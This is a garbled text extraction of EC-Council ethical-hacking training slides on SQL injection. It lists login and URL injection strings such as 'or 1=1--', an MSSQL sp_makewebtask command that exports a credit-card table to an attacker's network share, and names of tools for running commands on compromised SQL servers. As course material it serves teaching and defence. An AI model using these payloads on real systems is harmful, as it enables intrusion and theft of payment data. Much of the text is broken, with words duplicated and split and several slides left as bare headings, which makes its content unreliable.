Professional Documents
Culture Documents
Countermeasures
Version 6
Mod le XIX
Module
SQL Injection
Module Objective
Attacking
k SQL servers
Countermeasures
Copyright © by EC-Council
EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
What is SQL Injection
It is a technique
q of injecting
j g SQL
Q commands to exploit
p non-validated input
p
vulnerabilities in a web application database backend
Programmers
g use sequential
q commands with user input,
p , making
g it easier for
attackers to inject commands
Att k
Attackers can execute
t arbitrary
bit SQL commands
d through
th h the
th web
b application
li ti
Copyright © by EC-Council
EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Exploiting Web Applications
Try to look for pages that allow a user to submit data, for example: a log in
page, search
h page, feedback,
f db k etc
For example, to check whether it is using POST or GET, look for the <Form>
tag in the source code
<Form action=search.asp method=post>
<input type=hidden name=X value=Z>
</Form>
Copyright © by EC-Council
EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
What If It Doesn’t Take Input
Iff input
i is
i not given,
i check
h k for
f pages like
lik ASP,
AS JSP,
S CGI,
CG or PHP
Example:
• http://www.xsecurity.com/index.asp?id=blah’ or 1=1--
Copyright © by EC-Council
EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
OLE DB Errors
The user-filled fields are enclosed by a single quotation mark ('). To test, try
using
i (') as the
h user name
The following error message will be displayed when a (') is entered into a form
that is vulnerable
ulnerable to an SQL injection attack
If you get this error, then the website is vulnerable to an SQL injection attack
Copyright © by EC-Council
EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Input Validation Attack
Copyright © by EC-Council
EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
SQL Injection Techniques
Copyright © by EC-Council
EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
How to Test for SQL Injection
Vulnerability
• blah’ or 1=1—
• Login:blah
Login:blah’ or 1=1—
1 1
• Password:blah’ or 1=1—
• http://search/index.asp?id=blah’ or 1=1--
Depending
di on theh query, try the
h ffollowing
ll i
possibilities:
• ‘ or 1=1--
• “ or 1=1--
• ‘ or ‘a’=‘a
• “ or “a”=“a
) or (
• ‘) (‘a’=‘a)
)
Copyright © by EC-Council
EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Getting Output of SQL Query
Use sp_makewebtask
sp makewebtask to write a query into an HTML
Example
• blah‘;EXEC master..sp_makewebtask
“\\
“\\10.10.1.4\share\creditcard.html”,
\ h \ dit d ht l”
• “SELECT * FROM CREDITCARD”
• The above command exports a table called credit card, to the
attacker’s network share
Copyright © by EC-Council
EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
SQL Injection in Oracle
Copyright © by EC-Council
EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
SQL Injection in MySql Database
Itt iss d
difficult
cu t to ttrace
ace tthee output
You can see an error because the value retrieved is passed on to multiple
queries with different numbers of columns before the script ends
Copyright © by EC-Council
EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
SQL Injection Automated Tools
SQLDict
SqlExec
SQLbf
SQLSmack
SQL2.exe
AppDetective
Database Scanner
SQLPoke
Q
NGSSQLCrack
NGSSQuirreL
SQLPing v2.2
Copyright © by EC-Council
EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Hacking Tool: SQLDict
Source: http://ntsecurity.nu/cgi-bin/download/sqldict.exe.pl
Copyright © by EC-Council
EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Hacking Tool: SQLExec
This tool executes commands on compromised Microsoft SQL Servers by using xp_cmdshell
stored procedure
p
Source: http://phoenix.liu.edu/
Copyright © by EC-Council
EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Automagic SQL Injector
F
Features:
Copyright © by EC-Council
EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Blind SQL Injection
Copyright © by EC-Council
EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
SQL Injection Blocking Tool: SQLBlock
http://www.sqlblock.com
Copyright © by EC-Council
EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Summary
Copyright © by EC-Council
EC-Council All Rights Reserved. Reproduction is Strictly Prohibited